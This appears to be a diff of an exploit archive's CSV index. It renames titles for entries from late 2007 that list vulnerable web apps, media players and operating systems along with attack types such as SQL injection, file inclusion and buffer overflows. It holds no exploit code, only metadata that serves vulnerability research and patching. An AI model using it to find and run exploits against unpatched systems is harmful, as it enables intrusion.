4667,platforms/php/webapps/4667.txt,"PHP-Nuke NSN Script Depository 1.0.0 - Remote Source Disclosure",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 -4668,platforms/php/webapps/4668.txt,"wpQuiz 2.7 - Multiple Remote SQL Injection Vulnerabilities",2007-11-27,Kacper,php,webapps,0 +4668,platforms/php/webapps/4668.txt,"wpQuiz 2.7 - Multiple SQL Injection Vulnerabilities",2007-11-27,Kacper,php,webapps,0 4669,platforms/php/webapps/4669.txt,"project alumni 1.0.9 - (index.php act) Local File Inclusion",2007-11-27,tomplixsee,php,webapps,0 4670,platforms/php/webapps/4670.txt,"PHP-CON 1.3 - (include.php) Remote File Inclusion",2007-11-28,GoLd_M,php,webapps,0 -4671,platforms/php/webapps/4671.txt,"EHCP <= 0.22.8 - Multiple Remote File Inclusion Vulnerabilities",2007-11-28,MhZ91,php,webapps,0 +4671,platforms/php/webapps/4671.txt,"EHCP 0.22.8 - Multiple Remote File Inclusion Vulnerabilities",2007-11-28,MhZ91,php,webapps,0 4672,platforms/php/webapps/4672.txt,"Charrays CMS 0.9.3 - Multiple Remote File Inclusion Vulnerabilities",2007-11-28,MhZ91,php,webapps,0 4673,platforms/multiple/remote/4673.rb,"Apple QuickTime 7.2/7.3 - RSTP Response Universal Exploit (win/osx)",2007-11-29,"Subreption LLC.",multiple,remote,0 4674,platforms/php/webapps/4674.txt,"TuMusika Evolution 1.7R5 - Remote File Disclosure",2007-11-28,GoLd_M,php,webapps,0 -4675,platforms/php/webapps/4675.txt,"NoAh <= 0.9 pre 1.2 - (filepath) Remote File Disclosure Vulnerabilities",2007-11-28,GoLd_M,php,webapps,0 +4675,platforms/php/webapps/4675.txt,"NoAh 0.9 pre 1.2 - (filepath) Remote File Disclosure Vulnerabilities",2007-11-28,GoLd_M,php,webapps,0 4676,platforms/php/webapps/4676.txt,"Web-MeetMe 3.0.3 - (play.php) Remote File Disclosure",2007-11-29,Evil.Man,php,webapps,0 4677,platforms/php/webapps/4677.txt,"WebED 0.0.9 - (index.php) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 -4678,platforms/php/webapps/4678.php,"Seditio CMS <= 121 - Remote SQL Injection Exploit",2007-11-29,InATeam,php,webapps,0 +4678,platforms/php/webapps/4678.php,"Seditio CMS 121 - SQL Injection Exploit",2007-11-29,InATeam,php,webapps,0 4679,platforms/php/webapps/4679.txt,"KML share 1.1 - (region.php layer) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 4680,platforms/php/webapps/4680.txt,"LearnLoop 2.0beta7 - (sFilePath) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 4681,platforms/php/webapps/4681.txt,"ftp admin 0.1.0 - (LFI/XSS/ab) Multiple Vulnerabilities",2007-11-29,Omni,php,webapps,0 @@ -4330,100 +4330,100 @@ id,file,description,date,author,platform,type,port 4683,platforms/windows/dos/4683.py,"RealPlayer 11 Malformed AU File Denial of Service Exploit",2007-12-01,NtWaK0,windows,dos,0 4684,platforms/php/webapps/4684.txt,"tellmatic 1.0.7 - Multiple Remote File Inclusion Vulnerabilities",2007-12-01,ShAy6oOoN,php,webapps,0 4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Remote / Local File Inclusion Vulnerabilities",2007-12-01,Crackers_Child,php,webapps,0 -4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - Remote SQL Injection",2007-12-03,maku234,php,webapps,0 -4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 Active.asp Remote SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0 +4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0 +4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 Active.asp SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0 4688,platforms/windows/dos/4688.html,"VLC 0.86 < 0.86d ActiveX Remote Bad Pointer Initialization PoC",2007-12-04,"Ricardo Narvaja",windows,dos,0 -4689,platforms/osx/dos/4689.c,"Apple Mac OS X xnu <= 1228.0 - mach-o Local Kernel Denial of Service Proof of Concept",2007-12-04,mu-b,osx,dos,0 +4689,platforms/osx/dos/4689.c,"Apple Mac OS X xnu 1228.0 - mach-o Local Kernel Denial of Service Proof of Concept",2007-12-04,mu-b,osx,dos,0 4690,platforms/osx/dos/4690.c,"Apple Mac OS X 10.5.0 - (leopard) vpnd Remote Denial of Service PoC",2007-12-04,mu-b,osx,dos,0 -4691,platforms/php/webapps/4691.txt,"Mambo/Joomla Component rsgallery <= 2.0b5 - (catid) SQL Injection",2007-12-05,K-159,php,webapps,0 +4691,platforms/php/webapps/4691.txt,"Mambo/Joomla Component rsgallery 2.0b5 - (catid) SQL Injection",2007-12-05,K-159,php,webapps,0 4692,platforms/hardware/dos/4692.pl,"Cisco Phone 7940 - Remote Denial of Service Exploit",2007-12-05,MADYNES,hardware,dos,0 -4693,platforms/php/webapps/4693.txt,"SineCMS <= 2.3.4 Calendar Remote SQL Injection",2007-12-05,KiNgOfThEwOrLd,php,webapps,0 +4693,platforms/php/webapps/4693.txt,"SineCMS 2.3.4 Calendar SQL Injection",2007-12-05,KiNgOfThEwOrLd,php,webapps,0 4694,platforms/php/webapps/4694.txt,"ezContents 1.4.5 - (index.php link) Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0 -4695,platforms/php/webapps/4695.txt,"WordPress Plugin PictPress <= 0.91 - Remote File Disclosure",2007-12-05,GoLd_M,php,webapps,0 -4696,platforms/php/webapps/4696.txt,"SerWeb <= 2.0.0 dev1 2007-02-20 - Multiple RFI / LFI Vulnerabilities",2007-12-06,GoLd_M,php,webapps,0 -4697,platforms/asp/webapps/4697.txt,"MWOpen E-Commerce leggi_commenti.asp Remote SQL Injection",2007-12-06,KiNgOfThEwOrLd,asp,webapps,0 +4695,platforms/php/webapps/4695.txt,"WordPress Plugin PictPress 0.91 - Remote File Disclosure",2007-12-05,GoLd_M,php,webapps,0 +4696,platforms/php/webapps/4696.txt,"SerWeb 2.0.0 dev1 2007-02-20 - Multiple RFI / LFI Vulnerabilities",2007-12-06,GoLd_M,php,webapps,0 +4697,platforms/asp/webapps/4697.txt,"MWOpen E-Commerce leggi_commenti.asp SQL Injection",2007-12-06,KiNgOfThEwOrLd,asp,webapps,0 4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0 4699,platforms/windows/remote/4699.txt,"firefly media server (mt-daapd) 2.4.1 / svn 1699 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 -4700,platforms/windows/remote/4700.txt,"simple httpd <= 1.38 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 +4700,platforms/windows/remote/4700.txt,"simple httpd 1.38 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 MP4 File Stack Overflow Exploit",2007-12-08,"SYS 49152",windows,local,0 4702,platforms/windows/local/4702.pl,"Windows Media Player 6.4 MP4 File Stack Overflow PoC",2007-12-08,"SYS 49152",windows,local,0 4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - MP4 tags Stack Overflow Exploit",2007-12-08,"SYS 49152",windows,local,0 4704,platforms/php/webapps/4704.txt,"PolDoc CMS 0.96 - (download_file.php) File Disclosure",2007-12-08,GoLd_M,php,webapps,0 -4705,platforms/php/webapps/4705.txt,"Flat PHP Board <= 1.2 - Multiple Vulnerabilities",2007-12-09,KiNgOfThEwOrLd,php,webapps,0 -4706,platforms/php/webapps/4706.txt,"Content Injector 1.53 - (index.php) Remote SQL Injection",2007-12-09,S.W.A.T.,php,webapps,0 -4707,platforms/php/webapps/4707.txt,"Ace Image Hosting Script (id) Remote SQL Injection",2007-12-09,t0pP8uZz,php,webapps,0 -4708,platforms/php/webapps/4708.txt,"DWdirectory <= 2.1 - Remote SQL Injection",2007-12-09,t0pP8uZz,php,webapps,0 -4709,platforms/php/webapps/4709.txt,"SH-News 3.0 - (comments.php id) Remote SQL Injection",2007-12-09,hadihadi,php,webapps,0 +4705,platforms/php/webapps/4705.txt,"Flat PHP Board 1.2 - Multiple Vulnerabilities",2007-12-09,KiNgOfThEwOrLd,php,webapps,0 +4706,platforms/php/webapps/4706.txt,"Content Injector 1.53 - (index.php) SQL Injection",2007-12-09,S.W.A.T.,php,webapps,0 +4707,platforms/php/webapps/4707.txt,"Ace Image Hosting Script (id) SQL Injection",2007-12-09,t0pP8uZz,php,webapps,0 +4708,platforms/php/webapps/4708.txt,"DWdirectory 2.1 - SQL Injection",2007-12-09,t0pP8uZz,php,webapps,0 +4709,platforms/php/webapps/4709.txt,"SH-News 3.0 - (comments.php id) SQL Injection",2007-12-09,hadihadi,php,webapps,0 4710,platforms/php/webapps/4710.txt,"Lotfian.com DATABASE DRIVEN TRAVEL SITE - SQL Injection",2007-12-10,"Aria-Security Team",php,webapps,0 4711,platforms/php/webapps/4711.txt,"falt4 CMS rc4 10.9.2007 - Multiple Vulnerabilities",2007-12-10,"H-Security Labs",php,webapps,0 4712,platforms/php/webapps/4712.txt,"falcon CMS 1.4.3 - (RFI/XSS) Multiple Vulnerabilities",2007-12-10,MhZ91,php,webapps,0 -4713,platforms/windows/remote/4713.txt,"barracudadrive <= 3.7.2 - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 +4713,platforms/windows/remote/4713.txt,"barracudadrive 3.7.2 - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 4714,platforms/php/webapps/4714.pl,"MonAlbum 0.87 Upload Shell / Password Grabber Exploit",2007-12-10,v0l4arrra,php,webapps,0 -4715,platforms/windows/remote/4715.txt,"badblue <= 2.72b - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 +4715,platforms/windows/remote/4715.txt,"badblue 2.72b - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 4716,platforms/windows/dos/4716.html,"Online Media Technologies AVSMJPEGFILE.DLL 1.1 - Remote BoF PoC",2007-12-11,shinnai,windows,dos,0 -4717,platforms/windows/dos/4717.py,"Simple HTTPD <= 1.41 - (/aux) Remote Denial of Service Exploit",2007-12-11,shinnai,windows,dos,0 +4717,platforms/windows/dos/4717.py,"Simple HTTPD 1.41 - (/aux) Remote Denial of Service Exploit",2007-12-11,shinnai,windows,dos,0 4718,platforms/php/webapps/4718.rb,"SquirrelMail G/PGP Plugin deletekey() Command Injection Exploit",2007-12-11,Backdoored,php,webapps,0 4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make - (index.php template) Local File Inclusion",2007-12-11,MhZ91,php,webapps,0 4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks ActiveX Remote Code Execution Exploit",2007-12-11,porkythepig,windows,remote,0 -4721,platforms/php/webapps/4721.txt,"WordPress <= 2.3.1 - Charset Remote SQL Injection",2007-12-11,"Abel Cheung",php,webapps,0 +4721,platforms/php/webapps/4721.txt,"WordPress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",php,webapps,0 4722,platforms/php/webapps/4722.txt,"viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0 -4723,platforms/osx/dos/4723.c,"Apple Mac OS X xnu <= 1228.0 - super_blob Local kernel Denial of Service PoC",2007-12-12,mu-b,osx,dos,0 +4723,platforms/osx/dos/4723.c,"Apple Mac OS X xnu 1228.0 - super_blob Local kernel Denial of Service PoC",2007-12-12,mu-b,osx,dos,0 4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote BoF Exploit",2007-12-12,muts,windows,remote,80 4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 - config[fsBase] RFI",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0 4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 head.php Remote File Inclusion",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0 -4727,platforms/php/webapps/4727.txt,"CMS Galaxie Software (category_id) Remote SQL Injection",2007-12-13,MurderSkillz,php,webapps,0 +4727,platforms/php/webapps/4727.txt,"CMS Galaxie Software (category_id) SQL Injection",2007-12-13,MurderSkillz,php,webapps,0 4728,platforms/php/webapps/4728.txt,"Mms Gallery PHP 1.0 - (id) Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 4729,platforms/php/webapps/4729.txt,"xml2owl 0.1.1 - (filedownload.php) Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 -4730,platforms/asp/webapps/4730.txt,"hosting controller 6.1 hot fix <= 3.3 - Multiple Vulnerabilities",2007-12-13,BugReport.IR,asp,webapps,0 -4731,platforms/php/webapps/4731.php,"Adult Script <= 1.6 Unauthorized Administrative Access Exploit",2007-12-13,Liz0ziM,php,webapps,0 +4730,platforms/asp/webapps/4730.txt,"hosting controller 6.1 hot fix 3.3 - Multiple Vulnerabilities",2007-12-13,BugReport.IR,asp,webapps,0 +4731,platforms/php/webapps/4731.php,"Adult Script 1.6 Unauthorized Administrative Access Exploit",2007-12-13,Liz0ziM,php,webapps,0 4732,platforms/linux/dos/4732.c,"Samba 3.0.27a send_mailslot() Remote Buffer Overflow PoC",2007-12-14,x86,linux,dos,0 4733,platforms/php/webapps/4733.txt,"123tkShop 0.9.1 - Remote Authentication Bypass",2007-12-14,"Michael Brooks",php,webapps,0 4734,platforms/php/webapps/4734.txt,"Anon Proxy Server 0.1000 - Remote Command Execution",2007-12-14,"Michael Brooks",php,webapps,0 -4735,platforms/php/webapps/4735.txt,"Oreon 1.4 / Centreon 1.4.1 - Multiple RFI Vulnerabilties",2007-12-14,"Michael Brooks",php,webapps,0 +4735,platforms/php/webapps/4735.txt,"Oreon 1.4 / Centreon 1.4.1 - Multiple Remote File Inclusion Vulnerabilties",2007-12-14,"Michael Brooks",php,webapps,0 4736,platforms/php/webapps/4736.txt,"Form Tools 1.5.0b - Multiple Remote File Inclusion Vulnerabilities",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 -4737,platforms/php/webapps/4737.txt,"PHP Real Estate (fullnews.php id) Remote SQL Injection",2007-12-14,t0pP8uZz,php,webapps,0 +4737,platforms/php/webapps/4737.txt,"PHP Real Estate (fullnews.php id) SQL Injection",2007-12-14,t0pP8uZz,php,webapps,0 4738,platforms/php/webapps/4738.txt,"gf-3xplorer 2.4 - (XSS/LFI) Multiple Vulnerabilities",2007-12-18,MhZ91,php,webapps,0 -4739,platforms/php/webapps/4739.pl,"MOG-WebShop (index.php group) Remote SQL Injection Exploit",2007-12-18,k1tk4t,php,webapps,0 +4739,platforms/php/webapps/4739.pl,"MOG-WebShop (index.php group) SQL Injection Exploit",2007-12-18,k1tk4t,php,webapps,0 4740,platforms/php/webapps/4740.pl,"FreeWebshop 2.2.1 - Remote Blind SQL Injection Exploit",2007-12-18,k1tk4t,php,webapps,0 4741,platforms/php/webapps/4741.txt,"MySpace Content Zone 3.x - Remote File Upload",2007-12-18,Don,php,webapps,0 4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow PoC",2007-12-18,r4x,windows,dos,0 -4743,platforms/php/webapps/4743.pl,"FreeWebshop <= 2.2.7 - (cookie) Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0 +4743,platforms/php/webapps/4743.pl,"FreeWebshop 2.2.7 - (cookie) Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0 4744,platforms/hardware/remote/4744.txt,"rooter VDSL Device (Goahead WEBSERVER) Disclosure",2007-12-18,NeoCoderz,hardware,remote,0 4745,platforms/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC BoF Exploit (MS07-065)",2007-12-18,axis,windows,remote,0 4746,platforms/windows/remote/4746.html,"RavWare Software MAS Flic Control Remote Buffer Overflow Exploit",2007-12-18,shinnai,windows,remote,0 4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution Exploit",2007-12-18,rgod,windows,remote,0 4748,platforms/windows/dos/4748.php,"SurgeMail 38k4 - webmail Host header Denial of Service Exploit",2007-12-18,rgod,windows,dos,0 -4749,platforms/windows/local/4749.c,"Rosoft Media Player <= 4.1.7 - (.m3u) Stack Overflow Exploit",2007-12-18,devcode,windows,local,0 -4750,platforms/php/webapps/4750.txt,"phpMyRealty 1.0.x - (search.php type) Remote SQL Injection",2007-12-18,Koller,php,webapps,0 +4749,platforms/windows/local/4749.c,"Rosoft Media Player 4.1.7 - (.m3u) Stack Overflow Exploit",2007-12-18,devcode,windows,local,0 +4750,platforms/php/webapps/4750.txt,"phpMyRealty 1.0.x - (search.php type) SQL Injection",2007-12-18,Koller,php,webapps,0 4751,platforms/windows/local/4751.pl,"jetAudio 7.0.5 COWON Media Center MP4 - Stack Overflow Exploit",2007-12-18,"SYS 49152",windows,local,0 4753,platforms/php/webapps/4753.txt,"Dokeos 1.8.4 Bypass Upload Shell From Your Profile",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g - logurl() Remote Buffer Overflow Exploit (Win32) (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128 -4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) RFI",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 +4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) Remote File Inclusion",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4756,platforms/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - Bluetooth Stack Local Root Exploit",2007-12-18,Backdoored,linux,local,0 4757,platforms/windows/dos/4757.txt,"hp software update client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0 4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - (view.php list) Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0 4759,platforms/osx/local/4759.c,"Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit",2007-12-19,"Subreption LLC.",osx,local,0 4760,platforms/windows/remote/4760.txt,"Microsoft Windows 2000 - AS SP4 Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0 4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit",2007-12-21,eliteboy,multiple,remote,25 -4762,platforms/php/webapps/4762.txt,"nicLOR CMS (sezione_news.php) Remote SQL Injection",2007-12-21,x0kster,php,webapps,0 +4762,platforms/php/webapps/4762.txt,"nicLOR CMS (sezione_news.php) SQL Injection",2007-12-21,x0kster,php,webapps,0 4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 - (output) Remote File Inclusion",2007-12-21,CraCkEr,php,webapps,0 4764,platforms/php/webapps/4764.txt,"Arcadem LE 2.04 - (loadadminpage) Remote File Inclusion",2007-12-21,KnocKout,php,webapps,0 4765,platforms/php/webapps/4765.txt,"1024 CMS 1.3.1 - (LFI/SQL) Multiple Vulnerabilities",2007-12-21,irk4z,php,webapps,0 4766,platforms/php/webapps/4766.txt,"mBlog 1.2 - (page) Remote File Disclosure",2007-12-21,irk4z,php,webapps,0 4767,platforms/php/webapps/4767.txt,"Social Engine 2.0 - Multiple Local File Inclusion Vulnerabilities",2007-12-21,MhZ91,php,webapps,0 -4768,platforms/php/webapps/4768.py,"Shadowed Portal <= 5.7d3 - Remote Command Execution Exploit",2007-12-21,The:Paradox,php,webapps,0 -4769,platforms/php/webapps/4769.txt,"Shadowed Portal <= 5.7d3 - (POST) Remote File Inclusion",2007-12-21,The:Paradox,php,webapps,0 -4770,platforms/php/webapps/4770.txt,"Wallpaper Site 1.0.09 - (category.php) Remote SQL Injection",2007-12-22,Koller,php,webapps,0 -4771,platforms/php/webapps/4771.txt,"Ip Reg 0.3 - Multiple Remote SQL Injection Vulnerabilities",2007-12-22,MhZ91,php,webapps,0 -4772,platforms/php/webapps/4772.txt,"zBlog 1.2 - Remote SQL Injection",2007-12-22,Houssamix,php,webapps,0 +4768,platforms/php/webapps/4768.py,"Shadowed Portal 5.7d3 - Remote Command Execution Exploit",2007-12-21,The:Paradox,php,webapps,0 +4769,platforms/php/webapps/4769.txt,"Shadowed Portal 5.7d3 - (POST) Remote File Inclusion",2007-12-21,The:Paradox,php,webapps,0 +4770,platforms/php/webapps/4770.txt,"Wallpaper Site 1.0.09 - (category.php) SQL Injection",2007-12-22,Koller,php,webapps,0 +4771,platforms/php/webapps/4771.txt,"Ip Reg 0.3 - Multiple SQL Injection Vulnerabilities",2007-12-22,MhZ91,php,webapps,0 +4772,platforms/php/webapps/4772.txt,"zBlog 1.2 - SQL Injection",2007-12-22,Houssamix,php,webapps,0 4773,platforms/multiple/dos/4773.pl,"OpenSSL < 0.9.7l / 0.9.8d - SSLv2 Client Crash Exploit",2007-12-23,"Noam Rathaus",multiple,dos,0 -4774,platforms/php/webapps/4774.pl,"PHP ZLink 0.3 - (go.php) Remote SQL Injection Exploit",2007-12-23,DNX,php,webapps,0 -4775,platforms/php/webapps/4775.txt,"Adult Script <= 1.6.5 - Multiple Remote SQL Injection Vulnerabilities",2007-12-23,MhZ91,php,webapps,0 -4776,platforms/php/webapps/4776.txt,"MMSLamp (idpro) Remote SQL Injection",2007-12-23,x0kster,php,webapps,0 -4777,platforms/php/webapps/4777.txt,"WebSihirbazi 5.1.1 - (pageid) Remote SQL Injection",2007-12-24,bypass,php,webapps,0 -4778,platforms/php/webapps/4778.txt,"MeGaCheatZ 1.1 - Multiple Remote SQL Injection Vulnerabilities",2007-12-24,MhZ91,php,webapps,0 -4779,platforms/php/webapps/4779.php,"CuteNews <= 1.4.5 Admin Password md5 Hash Fetching Exploit",2007-12-24,waraxe,php,webapps,0 -4780,platforms/php/webapps/4780.txt,"ThemeSiteScript 1.0 - (index.php loadadminpage) RFI",2007-12-24,Koller,php,webapps,0 +4774,platforms/php/webapps/4774.pl,"PHP ZLink 0.3 - (go.php) SQL Injection Exploit",2007-12-23,DNX,php,webapps,0 +4775,platforms/php/webapps/4775.txt,"Adult Script 1.6.5 - Multiple SQL Injection Vulnerabilities",2007-12-23,MhZ91,php,webapps,0 +4776,platforms/php/webapps/4776.txt,"MMSLamp (idpro) SQL Injection",2007-12-23,x0kster,php,webapps,0 +4777,platforms/php/webapps/4777.txt,"WebSihirbazi 5.1.1 - (pageid) SQL Injection",2007-12-24,bypass,php,webapps,0 +4778,platforms/php/webapps/4778.txt,"MeGaCheatZ 1.1 - Multiple SQL Injection Vulnerabilities",2007-12-24,MhZ91,php,webapps,0 +4779,platforms/php/webapps/4779.php,"CuteNews 1.4.5 Admin Password md5 Hash Fetching Exploit",2007-12-24,waraxe,php,webapps,0 +4780,platforms/php/webapps/4780.txt,"ThemeSiteScript 1.0 - (index.php loadadminpage) Remote File Inclusion",2007-12-24,Koller,php,webapps,0 4781,platforms/php/webapps/4781.php,"Jupiter 1.1.5ex - Privileges Escalation Exploit",2007-12-24,BugReport.IR,php,webapps,0 4782,platforms/php/webapps/4782.txt,"Agares PhpAutoVideo 2.21 - Remote/Local File Inclusion Vulnerabilities",2007-12-24,MhZ91,php,webapps,0 4783,platforms/php/webapps/4783.txt,"Joomla Component mosDirectory 2.3.2 - Remote File Inclusion",2007-12-24,ShockShadow,php,webapps,0 @@ -4431,132 +4431,132 @@ id,file,description,date,author,platform,type,port 4785,platforms/php/webapps/4785.txt,"TeamCalPro 3.1.000 - Multiple Remote/Local File Inclusion Vulnerabilities",2007-12-25,GoLd_M,php,webapps,0 4786,platforms/php/webapps/4786.pl,"AuraCMS 2.2 - (admin_users.php) Remote Add Administrator Exploit",2007-12-25,k1tk4t,php,webapps,0 4787,platforms/php/webapps/4787.pl,"RunCMS 1.6 Get Admin Cookie Remote Blind SQL Injection Exploit",2007-12-25,sh2kerr,php,webapps,0 -4788,platforms/php/webapps/4788.txt,"MailMachine Pro 2.2.4 - Remote SQL Injection",2007-12-25,MhZ91,php,webapps,0 -4789,platforms/php/webapps/4789.php,"PMOS Help Desk <= 2.4 - Remote Command Execution Exploit",2007-12-25,EgiX,php,webapps,0 +4788,platforms/php/webapps/4788.txt,"MailMachine Pro 2.2.4 - SQL Injection",2007-12-25,MhZ91,php,webapps,0 +4789,platforms/php/webapps/4789.php,"PMOS Help Desk 2.4 - Remote Command Execution Exploit",2007-12-25,EgiX,php,webapps,0 4790,platforms/php/webapps/4790.txt,"runcms 1.6 - Multiple Vulnerabilities",2007-12-25,DSecRG,php,webapps,0 4791,platforms/php/webapps/4791.txt,"eSyndiCat Link Exchange Script 2005-2006 SQL Injection",2007-12-25,EgiX,php,webapps,0 4792,platforms/php/webapps/4792.pl,"RunCMS 1.6 - Remote Blind SQL Injection Exploit (IDS evasion)",2007-12-26,sh2kerr,php,webapps,0 -4793,platforms/php/webapps/4793.txt,"Blakord Portal <= Beta 1.3.A (all modules) SQL Injection",2007-12-26,JosS,php,webapps,0 -4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds <= 4.95.11 - LFI / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0 -4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds <= 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0 +4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A (all modules) SQL Injection",2007-12-26,JosS,php,webapps,0 +4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - LFI / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0 +4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0 4796,platforms/php/webapps/4796.txt,"PNphpBB2 <= 1.2i - (printview.php phpEx) Local File Inclusion",2007-12-26,irk4z,php,webapps,0 4797,platforms/hardware/remote/4797.pl,"March Networks DVR 3204 Logfile Information Disclosure Exploit",2007-12-27,"Alex Hernandez",hardware,remote,0 -4798,platforms/php/webapps/4798.php,"ZeusCMS <= 0.3 - Remote Blind SQL Injection Exploit",2007-12-27,EgiX,php,webapps,0 -4799,platforms/php/webapps/4799.txt,"Joovili <= 3.0.6 - (joovili.images.php) Remote File Disclosure",2007-12-27,EcHoLL,php,webapps,0 +4798,platforms/php/webapps/4798.php,"ZeusCMS 0.3 - Remote Blind SQL Injection Exploit",2007-12-27,EgiX,php,webapps,0 +4799,platforms/php/webapps/4799.txt,"Joovili 3.0.6 - (joovili.images.php) Remote File Disclosure",2007-12-27,EcHoLL,php,webapps,0 4800,platforms/php/webapps/4800.txt,"xml2owl 0.1.1 showCode.php Remote Command Execution",2007-12-28,MhZ91,php,webapps,0 4801,platforms/windows/dos/4801.html,"SkyFex Client 1.0 - ActiveX Start() Method Remote Stack Overflow",2007-12-28,shinnai,windows,dos,0 -4802,platforms/php/webapps/4802.txt,"XCMS <= 1.82 - Remote Local File Inclusion",2007-12-28,nexen,php,webapps,0 +4802,platforms/php/webapps/4802.txt,"XCMS 1.82 - Remote Local File Inclusion",2007-12-28,nexen,php,webapps,0 4804,platforms/php/webapps/4804.txt,"Hot or Not Clone by Jnshosts.com Database Backup Dump",2007-12-28,RoMaNcYxHaCkEr,php,webapps,0 -4805,platforms/php/webapps/4805.txt,"NoseRub <= 0.5.2 Login SQL Injection",2007-12-28,"Felix Groebert",php,webapps,0 +4805,platforms/php/webapps/4805.txt,"NoseRub 0.5.2 Login SQL Injection",2007-12-28,"Felix Groebert",php,webapps,0 4806,platforms/windows/remote/4806.html,"Persits Software XUpload Control AddFolder() Buffer Overflow Exploit",2007-12-28,Elazar,windows,remote,0 4807,platforms/php/webapps/4807.php,"jPORTAL 2.3.1 & UserPatch (forum.php) Remote Code Execution Exploit",2007-12-29,irk4z,php,webapps,0 -4808,platforms/php/webapps/4808.txt,"Mihalism Multi Forum Host <= 3.0.x - Remote File Inclusion",2007-12-29,GoLd_M,php,webapps,0 -4809,platforms/php/webapps/4809.txt,"CCMS 3.1 Demo Remote SQL Injection Exploit",2007-12-29,Pr0metheuS,php,webapps,0 -4810,platforms/php/webapps/4810.txt,"CMS Made Simple <= 1.2.2 - (TinyMCE module) SQL Injection",2007-12-30,EgiX,php,webapps,0 +4808,platforms/php/webapps/4808.txt,"Mihalism Multi Forum Host 3.0.x - Remote File Inclusion",2007-12-29,GoLd_M,php,webapps,0 +4809,platforms/php/webapps/4809.txt,"CCMS 3.1 Demo SQL Injection Exploit",2007-12-29,Pr0metheuS,php,webapps,0 +4810,platforms/php/webapps/4810.txt,"CMS Made Simple 1.2.2 - (TinyMCE module) SQL Injection",2007-12-30,EgiX,php,webapps,0 4811,platforms/php/webapps/4811.txt,"kontakt formular 1.4 - Remote File Inclusion",2007-12-30,bd0rk,php,webapps,0 4812,platforms/php/webapps/4812.txt,"Mihalism Multi Host 2.0.7 - download.php Remote File Disclosure",2007-12-30,GoLd_M,php,webapps,0 -4813,platforms/php/webapps/4813.txt,"XCMS <= 1.83 - Remote Command Execution Exploit",2007-12-30,x0kster,php,webapps,0 +4813,platforms/php/webapps/4813.txt,"XCMS 1.83 - Remote Command Execution Exploit",2007-12-30,x0kster,php,webapps,0 4814,platforms/php/webapps/4814.txt,"Bitweaver R2 CMS Remote File Upload / Disclosure Vulnerabilities",2007-12-30,BugReport.IR,php,webapps,0 4815,platforms/php/webapps/4815.txt,"matpo bilder galerie 1.1 - Remote File Inclusion",2007-12-30,Crackers_Child,php,webapps,0 